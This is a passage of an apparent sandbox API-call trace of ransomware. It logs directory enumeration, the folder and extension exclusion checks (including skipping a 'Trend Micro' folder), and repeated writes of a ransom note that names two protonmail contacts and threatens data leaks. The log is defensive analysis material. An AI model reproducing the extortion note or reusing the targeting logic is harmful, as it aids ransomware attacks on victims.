(lpFirst="verisign.bmp", lpSrch=".UAKXC") returned 0x0 [0154.066] StrStrIW (lpFirst="verisign.bmp", lpSrch=".exe") returned 0x0 [0154.066] StrStrIW (lpFirst="verisign.bmp", lpSrch=".dll") returned 0x0 [0154.066] StrStrIW (lpFirst="verisign.bmp", lpSrch=".lnk") returned 0x0 [0154.066] StrStrIW (lpFirst="verisign.bmp", lpSrch=".sys") returned 0x0 [0154.067] StrStrIW (lpFirst="verisign.bmp", lpSrch=".msi") returned 0x0 [0154.067] StrStrIW (lpFirst="verisign.bmp", lpSrch="R3ADM3.txt") returned 0x0 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeace0 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeace0 | out: hHeap=0xea0000) returned 1 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef2b0 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeace0 [0154.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee9c8 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef2b0 | out: hHeap=0xea0000) returned 1 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.067] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbf8 | out: hHeap=0xea0000) returned 1 [0154.067] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0154.068] Sleep (dwMilliseconds=0x32) [0154.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec698 | out: hHeap=0xea0000) returned 1 [0154.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec698 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0154.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbf8 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec630 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0154.154] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0154.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0154.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec630 | out: hHeap=0xea0000) returned 1 [0154.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbf8 | out: hHeap=0xea0000) returned 1 [0154.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\R3ADM3.txt" (normalized: "c:\\program files\\common files\\speechengines\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0154.317] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0154.317] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0154.318] CloseHandle (hObject=0x6dc) returned 1 [0154.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0154.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0154.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60f101d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60f101d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0154.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0154.319] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60f101d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60f101d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0154.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0154.319] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0154.319] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0154.319] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0154.319] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0154.320] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0154.320] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0154.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3078 [0154.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0154.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec630 [0154.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0154.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec630 | out: hHeap=0xea0000) returned 1 [0154.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0154.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3078 | out: hHeap=0xea0000) returned 1 [0154.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3078 [0154.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef2b0 [0154.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0154.320] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60f101d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x60f101d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60f101d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0154.320] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0154.320] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0154.320] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0154.320] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60f101d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x60f101d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60f101d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0154.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c78 | out: hHeap=0xea0000) returned 1 [0154.321] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc20 | out: hHeap=0xea0000) returned 1 [0154.321] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0154.321] Sleep (dwMilliseconds=0x32) [0154.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0154.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec698 | out: hHeap=0xea0000) returned 1 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0154.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc20 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec35a8 [0154.449] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec35a8 | out: hHeap=0xea0000) returned 1 [0154.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc20 | out: hHeap=0xea0000) returned 1 [0154.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\R3ADM3.txt" (normalized: "c:\\program files\\common files\\system\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0154.604] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0154.604] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0154.605] CloseHandle (hObject=0x6dc) returned 1 [0154.605] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.605] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.605] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x611bda90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x611bda90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0154.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0154.605] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x611bda90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x611bda90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0154.605] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0154.605] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0154.605] lstrcmpW (lpString1="ado", lpString2=".") returned 1 [0154.605] lstrcmpW (lpString1="ado", lpString2="..") returned 1 [0154.605] StrStrIW (lpFirst="ado", lpSrch="tmp") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="winnt") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="temp") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="thumb") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="$Recycle.Bin") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="$RECYCLE.BIN") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="System Volume Information") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="Boot") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="Windows") returned 0x0 [0154.606] StrStrIW (lpFirst="ado", lpSrch="Trend Micro") returned 0x0 [0154.606] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.606] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.606] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.606] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.606] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.606] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3208 [0154.606] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec698 [0154.606] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.606] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf4f1c09, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf4f1c09, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x128ffb00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0154.606] lstrcmpW (lpString1="DirectDB.dll", lpString2=".") returned 1 [0154.606] lstrcmpW (lpString1="DirectDB.dll", lpString2="..") returned 1 [0154.606] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".UAKXC") returned 0x0 [0154.606] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".exe") returned 0x0 [0154.606] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".dll") returned=".dll" [0154.606] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0154.606] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0154.606] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0154.606] StrStrIW (lpFirst="en-US", lpSrch="tmp") returned 0x0 [0154.606] StrStrIW (lpFirst="en-US", lpSrch="winnt") returned 0x0 [0154.606] StrStrIW (lpFirst="en-US", lpSrch="temp") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="thumb") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="$Recycle.Bin") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="$RECYCLE.BIN") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="System Volume Information") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="Boot") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="Windows") returned 0x0 [0154.607] StrStrIW (lpFirst="en-US", lpSrch="Trend Micro") returned 0x0 [0154.607] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.607] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.607] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.607] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.607] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.607] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21088 [0154.607] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0154.607] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.607] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0154.607] lstrcmpW (lpString1="msadc", lpString2=".") returned 1 [0154.607] lstrcmpW (lpString1="msadc", lpString2="..") returned 1 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="tmp") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="winnt") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="temp") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="thumb") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="$Recycle.Bin") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="$RECYCLE.BIN") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="System Volume Information") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="Boot") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="Windows") returned 0x0 [0154.607] StrStrIW (lpFirst="msadc", lpSrch="Trend Micro") returned 0x0 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf210b0 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0154.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.608] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSMAPI", cAlternateFileName="")) returned 1 [0154.608] lstrcmpW (lpString1="MSMAPI", lpString2=".") returned 1 [0154.608] lstrcmpW (lpString1="MSMAPI", lpString2="..") returned 1 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="tmp") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="winnt") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="temp") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="thumb") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="$Recycle.Bin") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="$RECYCLE.BIN") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="System Volume Information") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="Boot") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="Windows") returned 0x0 [0154.608] StrStrIW (lpFirst="MSMAPI", lpSrch="Trend Micro") returned 0x0 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2f78 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0154.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0154.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2f78 | out: hHeap=0xea0000) returned 1 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf210d8 [0154.608] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec630 [0154.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.608] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0154.608] lstrcmpW (lpString1="Ole DB", lpString2=".") returned 1 [0154.608] lstrcmpW (lpString1="Ole DB", lpString2="..") returned 1 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="tmp") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="winnt") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="temp") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="thumb") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="$Recycle.Bin") returned 0x0 [0154.609] StrStrIW (lpFirst="Ole DB", lpSrch="$RECYCLE.BIN") returned 